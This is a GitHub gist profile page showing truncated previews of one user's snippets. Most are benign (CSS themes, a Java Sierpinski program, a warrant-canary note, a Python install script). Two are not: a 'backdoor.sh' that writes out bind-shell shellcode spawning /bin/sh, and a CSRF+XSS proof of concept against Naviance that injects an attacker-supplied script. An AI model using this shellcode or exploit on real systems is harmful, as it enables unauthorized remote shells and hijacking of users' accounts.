Skip to content

Instantly share code, notes, and snippets.

View Arinerron's full-sized avatar
:shipit:
Free and Open Source Bugs (FOSB)

Aaron Esau Arinerron

:shipit:
Free and Open Source Bugs (FOSB)
View GitHub Profile
@Arinerron
Arinerron / readme.txt
Created April 18, 2017 00:31
LEAVE ME HERE
--------- readme.txt ---------
LEAVE ME HERE
------------------------------
@Arinerron
Arinerron / backdoor.sh
Created April 14, 2017 18:45
little backdoor
echo "unsigned char shellcode[] = \"\\x31\\xc0\\x40\\x74\\x60\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\xb3\\x01\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\\xc6\\xb0\\x66\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x52\\x56\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x52\\x52\\x56\\x89\\xe1\\xcd\\x80\\x93\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x92\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x50\\x89\\xe2\\xb0\\x0b\\xcd\\x80\\x48\\x31\\xc0\\x48\\x31\\xff\\x48\\x31\\xf6\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x6a\\x06\\x5a\\x6a\\x29\\x58\\x0f\\x05\\x49\\x89\\xc0\\x4d\\x31\\xd2\\x41\\x52\\x41\\x52\\xc6\\x04\\x24\\x02\\x66\\xc7\\x44\\x24\\x02\\x11\\x5c\\x48\\x89\\xe6\\x41\\x50\\x5f\\x6a\\x10\\x5a\\x6a\\x31\\x58\\x0f\\x05\\x41\\x50\\x5f\\x6a\\x01\\x5e\\x6a\\x32\\x58\\x0f\\x05\\x48\\x89\\xe6\\x48\\x31\\xc9\\xb1\\x10\\x51\\x48\\x89\\xe2\\x41\\x50\\x5f\\x6a\\x2b\\x58\\x0f\\x05\\x59\\x
@Arinerron
Arinerron / naviance.html
Created April 11, 2017 00:20
Naviance CSRF+XSS / proof of concept
<html>
<body>
<!--
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js".
-->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://connection.naviance.com/family-connection/success-planner/goals/save' target="csrf-frame" id="csrf-form">
@Arinerron
Arinerron / hackertheme.css
Created March 24, 2017 23:15
A green on black theme for tinygen
html {
background-color: #000000 !important;
color: #22ff00 !important;
font-family: monospace !important;
}
#siteTitle a {
color: #22ff00 !important;
font-family: monospace !important;
}
@Arinerron
Arinerron / Triangle.java
Last active March 19, 2017 02:50
A Sierpinski Triange program I made cause I was bored...
import java.util.*;
import java.awt.*;
import java.awt.image.*;
import javax.swing.*;
public class Triangle extends JPanel {
public final JFrame frame = new JFrame("Sierpinski Triangle");
public final int width = 500;
public final int height = 500;
@Arinerron
Arinerron / styles.css
Created March 10, 2017 07:07
My teendevops.net style
div.collapse.navbar-collapse.navbar-menubuilder {
background-color: #000000;
}
ul.nav.navbar-nav.navbar-left li a {
background-color: #000000;
color: #00f230;
font-family: monospace;
font-size: 16px;
}
@Arinerron
Arinerron / styles.css
Created March 10, 2017 06:17
My chaoswebs.net style
html {
font-family: monospace;
}
#postListArea {
border-color: #006b19;
border-width: 4px;
border-style: double;
}
@Arinerron
Arinerron / info.txt
Created February 26, 2017 23:00
The reason why I haven't updated my warrant canary...
public key -> http://arinerron.com/key.asc
fingerprint -> FA6E 4332 B944 9910
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The reason why I have not updated the warrant canary for the website arinerron.com is because the website is down for maintenance. There is nothing to be worried about. To my knowlege, neither the site has been hacked, nor have I received a NSL.
I will update the canary as soon as the site is off maintenance mode. Thanks.
-----BEGIN PGP SIGNATURE-----
@Arinerron
Arinerron / python.sh
Created January 17, 2017 02:06
Installs Python-3.4.2
wget https://www.python.org/ftp/python/3.4.2/Python-3.4.2.tgz
tar xvf Python-3.4.2.tgz
cd Python-3.4.2
./configure
make
make test
sudo make install
cd ..
rm -rf Python-3.4.2
rm Python-3.4.2.tgz